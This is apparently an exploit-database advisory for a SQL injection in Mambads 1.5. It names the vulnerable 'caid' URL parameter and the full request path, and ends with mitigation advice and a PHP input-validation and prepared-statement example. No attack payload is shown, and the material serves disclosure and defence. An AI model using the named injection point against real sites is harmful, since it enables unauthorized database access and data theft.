Vendor: Mambads
By: Sniper456
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: Mambads
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
2007
Mambads <= 1.5 SQL Injection
Mambads version 1.5 and below is vulnerable to SQL injection. An attacker can inject malicious SQL code through the 'caid' parameter of the URL 'index.php?option=com_mambads&Itemid=0&func=detail&cacat=1&casb=1&caid='. This can lead to unauthorized access to the database and potentially to leakage of sensitive information.
Mitigation:
To mitigate this vulnerability, it is recommended to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
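
One way to apply both recommendations to the 'caid' parameter is shown below. It is an added example, not Mambads code. The `ads` table, its columns, the function names `parse_caid` and `fetch_ad`, and the use of PDO with in-memory SQLite are assumptions made for illustration.

```php
<?php
declare(strict_types=1);
// Added example. Table and column names are hypothetical; sample rows are constructed.

/** Accept caid only as a short run of decimal digits; anything else is rejected. */
function parse_caid($raw): ?int
{
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;                       // arrays, '', signs, quotes, spaces, hex...
    }
    $id = (int) $raw;
    return $id > 0 ? $id : null;
}

/** Look the ad up with a bound integer parameter instead of string concatenation. */
function fetch_ad(PDO $db, int $caid): ?array
{
    $stmt = $db->prepare('SELECT id, title FROM ads WHERE id = :caid');
    $stmt->bindValue(':caid', $caid, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// In-memory SQLite stands in for the site database so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ads (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO ads (id, title) VALUES (1, 'Bicycle for sale')");

// Constructed request values for the caid query-string parameter.
foreach (['1', '2', "1'", '-1', 'abc', ''] as $raw) {
    $caid = parse_caid($raw);
    if ($caid === null) {
        echo var_export($raw, true), " => rejected (HTTP 400)\n";
        continue;
    }
    $ad = fetch_ad($db, $caid);
    echo var_export($raw, true), ' => ', $ad === null ? 'not found (HTTP 404)' : $ad['title'], "\n";
}
```

The same integer check applies to the other numeric parameters in the URL (Itemid, cacat, casb) if they reach a query.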